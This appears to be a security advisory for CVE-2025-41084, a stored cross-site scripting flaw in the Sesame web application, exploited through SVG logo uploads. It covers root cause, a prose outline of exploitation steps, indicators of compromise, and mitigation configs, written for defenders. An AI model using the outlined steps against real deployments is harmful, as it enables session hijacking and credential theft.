CVE-2025-41084 Overview
CVE-2025-41084 is a Stored Cross-Site Scripting (XSS) vulnerability in the Sesame web application caused by improper sanitization of uploaded SVG images. Attackers can embed malicious scripts in SVG files by sending a POST request using the logo parameter in /api/v3/companies/<ID>/logo. These malicious SVG files are then stored on the server and executed in the context of any user who accesses the compromised resource, potentially leading to session hijacking, credential theft, or other malicious actions.
Critical Impact
Attackers can persistently execute malicious JavaScript in victim browsers through crafted SVG uploads, enabling session hijacking and data theft across all users who view the compromised resource.
Affected Products
- Sesame web application (versions unspecified)
Discovery Timeline
- 2026-01-20 - CVE-2025-41084 published to NVD
- 2026-01-20 - Last updated in NVD database
Technical Details for CVE-2025-41084
Vulnerability Analysis
This vulnerability falls under CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the stored XSS variant. The Sesame web application fails to properly sanitize SVG image uploads, allowing attackers to inject malicious JavaScript code that persists on the server.
SVG files are XML-based vector images that can contain embedded JavaScript through elements like <script> tags, event handlers (e.g., onload, onerror), or <foreignObject> elements. When the application accepts these files without proper sanitization and serves them to users, the embedded scripts execute in the victim's browser context.
The attack requires authenticated access to upload a logo via the /api/v3/companies/<ID>/logo endpoint. Once uploaded, the malicious SVG persists on the server and executes whenever any user views the company logo, making this a particularly dangerous stored XSS scenario with potential for widespread impact across the user base.
Root Cause
The root cause is insufficient input validation and sanitization of SVG file uploads. The application does not strip or neutralize potentially dangerous elements and attributes within SVG files before storing them. This allows JavaScript code embedded within SVG elements to be preserved and later executed when the file is rendered in a browser context.
Attack Vector
The attack is network-based and requires low-privilege authenticated access to the application. The attacker uploads a maliciously crafted SVG file through the logo upload endpoint. The exploitation flow involves:
- Authenticating to the Sesame web application
- Crafting an SVG file containing malicious JavaScript (e.g., within <script> tags or event handlers)
- Uploading the SVG via POST request to /api/v3/companies/<ID>/logo
- Waiting for victims to access the resource displaying the compromised logo
- Malicious script executes in each victim's browser with full access to their session
The vulnerability requires user interaction—victims must view the page containing the malicious SVG. However, since company logos are typically displayed prominently, the attack surface is broad.
Detection Methods for CVE-2025-41084
Indicators of Compromise
- SVG files containing <script> elements or JavaScript event handlers (onload, onerror, onclick, etc.)
- Unexpected POST requests to /api/v3/companies/*/logo endpoints with SVG content
- SVG uploads containing <foreignObject>, <use>, or <animate> elements with external references
- Browser console errors or unexpected script execution originating from SVG resources
Detection Strategies
- Implement Content Security Policy (CSP) headers to detect and block inline script execution from SVG files
- Monitor web application logs for suspicious logo upload activity, particularly SVG files from unexpected sources
- Deploy web application firewall (WAF) rules to inspect SVG uploads for malicious patterns
- Utilize browser-based XSS detection tools during security testing to identify stored XSS vulnerabilities
Monitoring Recommendations
- Enable detailed logging for all file upload endpoints, capturing file types, content hashes, and user context
- Set up alerts for SVG uploads containing potentially dangerous XML elements or attributes
- Monitor for unusual patterns in logo access, such as high-frequency requests that may indicate exploitation
- Review authentication logs for accounts uploading suspicious files
How to Mitigate CVE-2025-41084
Immediate Actions Required
- Audit all existing SVG files in the application for malicious content and remove any compromised uploads
- Implement server-side SVG sanitization using libraries like DOMPurify or svg-sanitizer before storing uploads
- Consider converting SVG uploads to rasterized formats (PNG, JPEG) to eliminate script execution risk
- Deploy Content Security Policy headers with strict directives to prevent inline script execution
Patch Information
Refer to the Incibe Security Notice for official vendor guidance and patch information. Organizations should contact the Sesame application vendor for specific patch availability and upgrade instructions.
Workarounds
- Block SVG file uploads entirely until proper sanitization is implemented
- Serve uploaded SVG files with Content-Type: image/svg+xml and Content-Disposition: attachment headers to prevent inline rendering
- Implement strict Content Security Policy with script-src 'self' to block inline scripts from SVG files
- Convert all SVG uploads to PNG or other safe raster formats server-side before storage
# Example Content Security Policy header configuration (Apache)
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; img-src 'self' data:;"
# Example SVG-specific header for nginx
location ~* \.svg$ {
add_header Content-Security-Policy "script-src 'none'";
add_header X-Content-Type-Options "nosniff";
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
